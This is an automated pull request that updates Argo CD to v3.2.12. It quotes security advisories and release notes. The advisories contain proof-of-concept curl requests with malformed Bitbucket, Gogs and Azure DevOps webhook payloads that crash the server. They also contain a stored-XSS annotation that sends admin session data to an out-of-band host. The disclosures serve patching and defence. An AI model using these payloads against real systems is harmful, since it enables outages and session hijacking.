fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.2.12 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/argoproj/argo-cd/v3	v3.1.2 → v3.2.12

---

Repository Credentials Race Condition Crashes Argo CD Server

CVE-2025-55191 / GHSA-g88p-r42r-ppp9

More information

Details

Summary

A race condition in the repository credentials handler can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL.

Details

The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. For example, in the secretToRepoCred function. The issue manifests as a concurrent map access panic:

concurrent map read and map write
...
goroutine 1104 [running]:
github.com/argoproj/argo-cd/v2/util/db.(*secretsRepositoryBackend).secretToRepoCred(0xc000e50ea8?, 0xc000c65540)
        /go/src/github.com/argoproj/argo-cd/util/db/repository_secrets.go:404 +0x31e

The race condition occurs due to:

1. Concurrent repository credential operations (create/update/delete) accessing the same map
2. Kubernetes informer re-syncs happening simultaneously
3. Background watchers updating the same secret data
4. No mutex protection for map access

A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition.

Impact

This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. Default ArgoCD configuration is vulnerable.

The affected code was originally introduced in PR #​6103 and released in v2.1.0.

This data race was addressed by deep-copying the Secret objects before reading/writing.

Credits

This vulnerability was found, reported and fixed by:

@​thevilledev

The Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9
• https://github.com/argoproj/argo-cd/pull/6103
• https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7
• https://nvd.nist.gov/vuln/detail/CVE-2025-55191
• https://pkg.go.dev/vuln/GO-2025-3994
• https://github.com/advisories/GHSA-g88p-r42r-ppp9

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload

CVE-2025-59531 / GHSA-f9gq-prrc-hrhc

More information

Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.bitbucketserver.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Bitbucket-Server push event whose JSON field repository.links.clone is anything other than an array.

A single unauthenticated curl request can push the control-plane into CrashLoopBackOff; repeating the request on each replica causes a complete outage of the API.

Details

// webhook.go (Bitbucket-Server branch in affectedRevisionInfo)

for _, l := range payload.Repository.Links["clone"].([]any) {   // <- unsafe cast
    link := l.(map[string]any)
    ...
}

If links.clone is a string, number, object, or null, the first type assertion panics:
interface conversion: interface {} is string, not []interface {}

The worker goroutine created by startWorkerPool lacks a recover, so the panic terminates the whole binary.

PoC

Save as payload-panic.json - note the non-array links.clone.

{
  "eventKey": "repo:refs_changed",
  "repository": {
    "name": "guestbook",
    "fullName": "APP/guestbook",
    "links": { "clone": "boom" }
  },
  "changes": [ { "ref": { "id": "refs/heads/master" } } ]
}

curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Event-Key: repo:refs_changed' \
     -H 'Content-Type: application/json' \
     --data-binary @​payload-panic.json

Observed crash (argocd-server restart):

panic: interface conversion: interface {} is string, not []interface {}
goroutine 192 [running]:
github.com/argoproj/argo-cd/v3/server/webhook.affectedRevisionInfo
    webhook.go:209 +0x1218
...

Mitigation

If you use Bitbucket Server and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Bitbucket Server, you can set the webhook secret to a long, random value to effectively disable webhook handling for Bitbucket Server payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.bitbucketserver.secret: <your base64-encoded secret here>

For more information

• Open an issue in the Argo CD issue tracker or discussions
• Join us on Slack in channel #argo-cd

Credits

Discovered by Jakub Ciolek at AlphaSense.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc
• https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f
• https://nvd.nist.gov/vuln/detail/CVE-2025-59531
• https://pkg.go.dev/vuln/GO-2025-3993
• https://github.com/advisories/GHSA-f9gq-prrc-hrhc

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload

CVE-2025-59537 / GHSA-wp4p-9pxh-cgx2

More information

Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null.

Details

Users can access /api/webhook without authentication, and when accessing this endpoint, the Handler function parses webhook type messages according to the header (e.g. X-Gogs-Event) and body parameters provided by the user. The Parse function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.

The affectedRevisionInfo function parses data according to webhook event types(e.g. gogsclient.PushPayload). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.

func affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {
    switch payload := payloadIf.(type) {
        // ...
        case gogsclient.PushPayload:
            webURLs = append(webURLs, payload.Repo.HTMLURL) // bug
            // ...
        }
    return webURLs, revision, change, touchedHead, changedFiles
}

PoC

payload-gogs.json

{
  "ref": "refs/heads/master",
  "before": "0000000000000000000000000000000000000000",
  "after": "0a05129851238652bf806a400af89fa974ade739",
  "commits": [{}]
}

curl -k -v https://argocd.example.com/api/webhook \
  -H 'X-Gogs-Event: push' \
  -H 'Content-Type: application/json' \
  --data-binary @​/tmp/payload-gogs.json

An attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to /api/webhook.

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]

goroutine 302 [running]:
github.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60
created by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28

Mitigation

If you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.gogs.secret: <your base64-encoded secret here>

For more information

• Open an issue in the Argo CD issue tracker or discussions
• Join us on Slack in channel #argo-cd

Credit

Sangjun Song (s0ngsari) at Theori (theori.io)

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2
• https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43
• https://nvd.nist.gov/vuln/detail/CVE-2025-59537
• https://pkg.go.dev/vuln/GO-2025-39896
• https://github.com/advisories/GHSA-wp4p-9pxh-cgx2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

CVE-2025-59538 / GHSA-gpx4-37g2-c8pv

More information

Details

Summary

In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.

The slice index [0] is accessed without a length check, causing an index-out-of-range panic.

A single unauthenticated HTTP POST is enough to kill the process.

Details

case azuredevops.GitPushEvent:
    // util/webhook/webhook.go -- line ≈147
    revision        = ParseRevision(payload.Resource.RefUpdates[0].Name)        // panics if slice empty
    change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
    change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
    touchedHead     = payload.Resource.RefUpdates[0].Name ==
                      payload.Resource.Repository.DefaultBranch

If the attacker supplies "refUpdates": [], the slice has length 0.

The webhook code has no recover(), so the panic terminates the entire binary.

PoC

payload-azure-empty.json:

{
  "eventType": "git.push",
  "resource": {
    "refUpdates": [],
    "repository": {
      "remoteUrl": "https://example.com/dummy",
      "defaultBranch": "refs/heads/master"
    }
  }
}

curl call:

curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
     -H 'Content-Type: application/json' \
     --data-binary @​payload-azure-empty.json

Observed crash:

panic: runtime error: index out of range [0] with length 0

goroutine 205 [running]:
github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo
    webhook.go:147 +0x1ea5
...

Mitigation

If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.azuredevops.username: <your base64-encoded secret here>
+  webhook.azuredevops.password: <your base64-encoded secret here>

For more information

• Open an issue in the Argo CD issue tracker or discussions
• Join us on Slack in channel #argo-cd

Credits

Discovered by Jakub Ciolek at AlphaSense.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv
• https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf
• https://nvd.nist.gov/vuln/detail/CVE-2025-59538
• https://pkg.go.dev/vuln/GO-2025-3995
• https://github.com/advisories/GHSA-gpx4-37g2-c8pv

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Argo CD: Stored XSS in application link annotations enables developer-to-admin privilege escalation

CVE-2026-45738 / GHSA-h98r-wv3h-fr38

More information

Details

Summary

A user with application write access (developer role) can set link.argocd.argoproj.io/* annotations on any ArgoCD Application. These annotation values are rendered in the Summary tab's URLs section as <a href> elements without URL validation. Using the pipe-separator trick (Display Text | javascript:...), an attacker can inject a javascript: URI while displaying a legitimate-looking label (e.g. GitHub Repo). When a higher-privileged user (admin) clicks the link, arbitrary JavaScript executes in the ArgoCD origin context in the admin's authenticated session context, enabling API exfiltration and privilege escalation from developer to admin.

Details

Vulnerable sink: ui/src/app/applications/components/application-summary/application-summary.tsx:277

const parts = (url || '').split('|');
<a key={i} href={parts.length > 1 ? parts[1] : parts[0]} target='_blank'>
    {parts[0]}
</a>

The annotation value is split on |. parts[0] becomes the visible link label; parts[1] becomes the href. No call to isValidURL() is made, unlike the protected ApplicationURLs component (application-urls.tsx:72,80) which does validate URLs and blocks javascript:. The target='_blank' opens a new tab that inherits the ArgoCD origin, giving the injected script same-origin fetch access to all ArgoCD APIs using the victim's authenticated session (credentialed fetch() calls).

Root cause: React 16.x does not block javascript: URIs in href attributes (this protection was added in React 19). The helper isValidURL() exists in shared/utils.ts but is not applied to this sink.

CSP: ArgoCD's default Content Security Policy is frame-ancestors 'self' only — no script-src, no connect-src, no default-src — providing zero XSS execution mitigation.

PoC

Prerequisites: Developer role with application write access (e.g. RBAC: p, role:developer, applications, *, */*, allow).

Step 1 — Set malicious annotation as developer:

kubectl annotate application <app-name> -n argocd \
  'link.argocd.argoproj.io/docs=GitHub Repo|javascript:fetch("https://<argocd-host>/api/v1/session/userinfo",{credentials:"include"}).then(r=>r.json()).then(d=>fetch("https://xxx.oastify.com/?d="+btoa(JSON.stringify(d)),{mode:"no-cors"}))'

The URL section in the admin's Summary tab renders the link as "GitHub Repo" — the javascript: payload is invisible in the displayed text.

Step 2 — Admin opens Summary tab of the annotated application and clicks the link.

Step 3 — JavaScript executes at the ArgoCD origin and exfiltrates admin session data via out-of-band HTTP request. Tested with Burp Collaborator:

// Payload used during testing (Burp Collaborator OOB):
fetch("https://<argocd-host>/api/v1/session/userinfo", {credentials:"include"})
  .then(r => r.json())
  .then(d => fetch("https://xxx.oastify.com/?d=" + btoa(JSON.stringify(d)), {mode:"no-cors"}))

Step 4 — Burp Collaborator received the OOB HTTP interaction containing the base64-encoded admin session data. Decoded response:

{"iss":"argocd","loggedIn":true,"username":"admin"}

Tested on: ArgoCD v3.3.8 (commit 0850e97), React 16.9.3.

Impact

• Stored XSS — payload persists in the Kubernetes Application resource until manually removed
• Privilege escalation — developer role → admin session hijacking via authenticated API calls
• Maximum stealth — the injected link displays as any attacker-chosen text; the javascript: href is never visible to the victim
• No server-side interaction required — purely client-side exploit, no network egress needed for execution (exfiltration uses no-cors fetch, bypassed by absent connect-src CSP)
• Any admin or operator who views the Summary tab of the compromised application is affected

Credits

Discovered and reported by Jan Kahmen (jan@turingpoint.de) — turingpoint.de

Severity

• CVSS Score: 7.3 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

References

• https://github.com/argoproj/argo-cd/security/advisories/GHSA-h98r-wv3h-fr38
• https://github.com/advisories/GHSA-h98r-wv3h-fr38

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

argoproj/argo-cd (github.com/argoproj/argo-cd/v3)

v3.2.12

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.12/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.12/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 2d1a0bb: fix(lint): unnecessary nesting (cherry-pick #​27815 for 3.2) (#​27819) (@​argo-cd-cherry-pick-bot[bot])
• 4caf270: fix: export url validation function (#​27816) (@​crenshaw-dev)
• d6e96fc: fix: wrap lines toggle causes log lines to overflow container - Fixes [Issue #​27586] (cherry-pick #​27627 for 3.2) (#​27668) (@​argo-cd-cherry-pick-bot[bot])

Dependency updates

• cff8c03: chore(deps): bump github.com/moby/spdystream from 0.5.0 to 0.5.1 (cherry-pick #​27401 for 3.2) (#​27735) (@​argo-cd-cherry-pick-bot[bot])

Other work

• 3f7237b: Merge commit from fork (@​pjiang-dev)
• c8df5ff: Merge commit from fork (@​blakepettersson)

Full Changelog: argoproj/argo-cd@v3.2.11...v3.2.12

v3.2.11

Compare Source

[!IMPORTANT]
This release contains a security fix to a critical vulnerability: GHSA-3v3m-wc6v-x4x3

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.11/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.11/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• de48839: fix(server): Avoid error when attempting a second delete operation (cherry-pick #​27495 for 3.2) (#​27500) (@​argo-cd-cherry-pick-bot[bot])
• 81e6c69: fix(ui): handle 401 error in stream (cherry-pick #​26917 for 3.2) (#​27572) (@​argo-cd-cherry-pick-bot[bot])
• eadd52e: fix(ui): prevent pod logs viewer crash on stale container index (cherry-pick #​27553 for 3.2) (#​27563) (@​argo-cd-cherry-pick-bot[bot])

Dependency updates

• 37c360e: chore(deps): bump SonarSource/sonarqube-scan-action from 5.3.1 to 8.0.0 (cherry pick 27602 to release 3.2) (#​27609) (@​dudinea)

Other work

• 9625be3: Merge commit from fork (@​alexmt)

Full Changelog: argoproj/argo-cd@v3.2.10...v3.2.11

v3.2.10

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.10/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.10/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 91da6a0: Revert "fix: prevent automatic refreshes from informer resync and status updates (cherry-pick #​25290 for 3.2)" (#​27399) (@​crenshaw-dev)
• 5426e98: fix(appcontroller): application controller in core mode fails to sync when server.secretkey is missing (#​26793) (#​27463) (@​anandf)
• c3df70e: fix(cli): uses DrySource revision for app diff/manifests with sourceHydrator (#​23817) (cherry-pick #​24670 for 3.2) (#​27482) (@​argo-cd-cherry-pick-bot[bot])
• 3f789ce: fix: avoid stale informer cache in RevisionMetadata handler (cherry-pick #​27392 for 3.2) (#​27394) (@​argo-cd-cherry-pick-bot[bot])
• 860ef55: fix: revert autosync event message format change (cherry-pick #​27387 for 3.2) (#​27388) (@​argo-cd-cherry-pick-bot[bot])

Full Changelog: argoproj/argo-cd@v3.2.9...v3.2.10

v3.2.9

Compare Source

Quick Start

[!IMPORTANT]
A potential bug with application reconciliation has been identified in this release. The application controller may fail to refresh applications, causing an application to not sync / show resources as out of sync.

Issue: #​27344 – Application controller not refreshing applications

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.9/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.9/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 8420af5: fix(ci): run yarn install with --frozen-lockfile (cherry-pick #​27099 for 3.2) (#​27355) (@​dudinea)
• d76e1bd: fix(ui): OCI revision metadata never renders due to conflicting guard clause (#​26948) (cherry-pick #​27097 for 3.2) (#​27364) (@​argo-cd-cherry-pick-bot[bot])
• f9623ce: fix: prevent automatic refreshes from informer resync and status updates (cherry-pick #​25290 for 3.2) (#​27236) (@​aali309)

Dependency updates

• a39f06d: chore(deps): bump fast-xml-parser from 4.5.3 to 4.5.6 in /ui - 3.2 (#​27361) (@​keithchong)
• 9ff165a: chore(deps): update notifications-engine dependency in release-3.2 to v0.5.1-0.20260316232552-d27ba0152c1c (#​27094) (@​pasha-codefresh)

Full Changelog: argoproj/argo-cd@v3.2.8...v3.2.9

v3.2.8

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.8/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.8/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 65378e6: fix(UI): show RollingSync step clearly when labels match no step (cherry-pick #​26877 for 3.2) (#​26883) (@​argo-cd-cherry-pick-bot[bot])
• 1515e91: fix: controller incorrectly detecting diff during app normalization (cherry-pick #​27002 for 3.2) (#​27012) (@​argo-cd-cherry-pick-bot[bot])
• 5fca1ce: fix: mitigation of grpc-go CVE-2026-33186 for release-3.2 (#​26983) (@​dudinea)

Other work

• e7d33de: chore: use base ref for cherry-pick prs (cherry-pick #​26551 for 3.2) (#​26554) (@​argo-cd-cherry-pick-bot[bot])

Full Changelog: argoproj/argo-cd@v3.2.7...v3.2.8

v3.2.7

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.7/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.7/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• ca08f90: fix(server): OIDC config via secrets fails (#​18269) (cherry-pick #​26214 for 3.2) (#​26389) (@​argo-cd-cherry-pick-bot[bot])
• 10c3fd0: fix: Fix excessive ls-remote requests on monorepos with Auto Sync enabled apps (26277) (cherry-pick #​26278 for 3.2) (#​26502) (@​dudinea)
• 9c128e2: fix: compressedLayerExtracterStore+isCompressedLayer - allow tar.gzip suffixes (cherry-pick #​26355 for 3.2) (#​26375) (@​argo-cd-cherry-pick-bot[bot])

Dependency updates

• 75eddbd: chore(deps): update group golang to v1.25.6 (cherry-pick release-3.2) (#​26291) (@​nitishfy)

Other work

• 1f03b27: ci: exclude testdata from sonar.exclusions (cherry-pick #​26398 and #​26371 for 3.2) (#​26424) (@​argo-cd-cherry-pick-bot[bot])

Full Changelog: argoproj/argo-cd@v3.2.6...v3.2.7

v3.2.6

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.6/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.6/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 20866f4: fix(hydrator): .gitattributes include deeply nested files (#​25870) (cherry-pick #​26011 for 3.2) (#​26012) (@​argo-cd-cherry-pick-bot[bot])
• 508da9c: fix(hydrator): empty links for failed operation (#​25025) (cherry-pick #​26014 for 3.2) (#​26016) (@​argo-cd-cherry-pick-bot[bot])
• 2ff406a: fix: cherry pick #​25516 to release-3.2 (#​26115) (@​FourFifthsCode)
• e3b108b: fix: close response body on error paths to prevent connection leak (cherry-pick #​25824 for 3.2) (#​26006) (@​argo-cd-cherry-pick-bot[bot])
• ad117b8: fix: invalid error message on health check failure (#​26040) (cherry pick #​26039 for 3.2) (#​26070) (@​dudinea)

Dependency updates

• 76fc92f: chore(deps): update notifications-engine to fix GitHub PR comments nil panic (cherry-pick #​26065 for 3.2) (#​26074) (@​soutar)

Full Changelog: argoproj/argo-cd@v3.2.5...v3.2.6

v3.2.5

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.5/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.5/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Features

• fafbd44: feat: Cherry-pick to 3.2 update notifications engine to v0.5.1 0.20251223091026 8c0c96d (#​25930) (@​reggie-k)

Bug fixes

• d7d9674: fix(appset): do not trigger reconciliation on appsets not part of allowed namespaces when updating a cluster secret (cherry-pick #​25622 for 3.2) (#​25911) (@​argo-cd-cherry-pick-bot[bot])
• e6f5403: fix: Only show please update resource specification message when spec… (cherry-pick #​25066 for 3.2) (#​25895) (@​argo-cd-cherry-pick-bot[bot])

Documentation

• e9d03a6: docs: Run make codegen for notifications engine changes (#​25958) (@​reggie-k)
• b67eb40: docs: link to source hydrator (cherry-pick #​25813 for 3.2) (#​25814) (@​argo-cd-cherry-pick-bot[bot])

Dependency updates

• 8a0633b: chore(deps): bump go to 1.25.5 (cherry-pick) (#​25805) (@​nitishfy)

Other work

• b414696: chore(cherry-pick-3.2): bump expr to v1.17.7 (#​25889) (@​nitishfy)
• 51c6375: ci: test against k8s 1.34.2 (cherry-pick #​25856 for 3.2) (#​25859) (@​argo-cd-cherry-pick-bot[bot])

Full Changelog: argoproj/argo-cd@v3.2.3...v3.2.5

v3.2.4

Compare Source

Important notice about this release

This release is invalid, please use the v3.2.5 instead.

v3.2.3

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.3/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.3/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Dependency updates

• 8f903c3: chore(deps): bump golang.org/x/crypto from 0.42.0 to 0.46.0 (#​25791) (@​anandf)

Full Changelog: argoproj/argo-cd@v3.2.2...v3.2.3

v3.2.2

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.2/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.2.2/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 122f4db: fix(hydrator): appset should preserve annotation when hydration is requested (cherry-pick #​25644 for 3.2) (#​25654) (@​argo-cd-cherry-pick-bot[bot])
• 33b5043: fix(oidc): check userinfo endpoint in AuthMiddleware (cherry-pick #​23586 for 3.2) (#​25415) (@​mkilchhofer)
• 784f62c: fix(server): update resourceVersion on Terminate retry (cherry-pick #​25650 for 3.2) (#​25718) (@​argo-cd-cherry-pick-bot[bot])
• 732b16f: fix: create read and write secret for same url (cherry-pick #​25581 for 3.2) (#​25589) (@​argo-cd-cherry-pick-bot[bot])

Docum

✂ Note

PR body was truncated to here.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 1 additional dependency was updated

Details:

Package	Change
github.com/argoproj/gitops-engine	v0.7.1-0.20250617174952-093aef0dad58 -> v0.7.1-0.20250905160054-e48120133eec

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[renovate]

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 44 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.24.6 -> 1.25.5
k8s.io/api	v0.33.4 -> v0.34.0
k8s.io/apimachinery	v0.33.4 -> v0.34.0
k8s.io/client-go	v0.33.4 -> v0.34.0
k8s.io/kubectl	v0.33.1 -> v0.34.0
cloud.google.com/go/compute/metadata	v0.6.0 -> v0.7.0
github.com/Azure/azure-sdk-for-go/sdk/azcore	v1.18.0 -> v1.19.1
